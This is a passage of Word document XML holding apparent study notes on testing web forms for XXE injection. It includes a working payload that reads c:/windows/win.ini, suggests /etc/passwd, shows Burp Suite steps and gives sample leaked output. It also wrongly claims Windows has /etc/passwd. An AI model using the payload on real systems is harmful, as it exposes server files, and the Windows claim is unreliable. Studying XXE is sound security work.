        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1309"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;to&gt;, &lt;from&gt;, &lt;message&gt;, and &lt;date&gt; are nested inside the root element.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C1F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C20">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Key-Value Structure:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C21">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1224"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Each element has a tag and its corresponding value (e.g., &lt;to&gt;Alice&lt;/to&gt;).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C22">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C23">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C24">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to test for XXE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1152"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you send a request after inputting some values, and you see some XML code, then you can try XXE. For example take this example below. Assume you have a form with 3 values: quantity, item, and address. The XML might look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C26">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C27">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C28">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C29">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?xml version = "1.0"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C2A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;order&gt;&lt;quantity&gt;10&lt;/quantity&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C2B">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;item&gt;Home Appliances&lt;/item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C2C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;address&gt;Test address&lt;/address&gt;&lt;/order&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C2D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C2E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="518"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then you will want to inject some XML code in the line right after the first line. To test to see if it's vulnerable, we can try checking the contents inside of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">c:/windows/win.ini</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is a legacy configuration file used by older versions of Windows, but it's usually there on all Windows. The expected format is something like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="518"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[fonts]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="518"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fixedsys=Fixedsys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C32">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="518"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[extensions]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="518"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">txt=notepad.exe ^.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C35">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="518"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[mci extensions]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="518"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wav=waveaudio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C38">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C39">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="758"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And to attempt to read win.ini, we replace the XML code that we got from the request and turn it into the below. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Send the request to the repeater on burpsuite so you can see the response you get</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C3B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C3C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?xml version="1.0"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C3D">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE foo [</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C3E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!ENTITY xxe SYSTEM </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"file:///c:/windows/win.ini"&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C3F">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C40">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;order&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C41">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;quantity&gt;3&lt;/quantity&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C42">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;item&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;xxe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;&lt;/item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C43">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;address&gt;Test Address&lt;/address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C44">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/order&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C45">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1435"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also test with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file:///etc/passwd </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">since it works for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BOTH LINUX AND WINDOWS since the format "file:///" works for both windows and linux and they both have a /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1435"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As you can see, we made this new thing after the first line, and then inside of the "item" tags, we put that variable in. Item is one of the things that accepts text inside of the website. Quantity was a drag and drop so it didn't work when you put the variable inside that. You should see the insides of win.ini, like below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C48">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C49">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Your order for ; for 16-bit app support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C4A">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[fonts]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C4B">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[extensions]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C4C">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[mci extensions]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C4D">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[files]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C4E">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
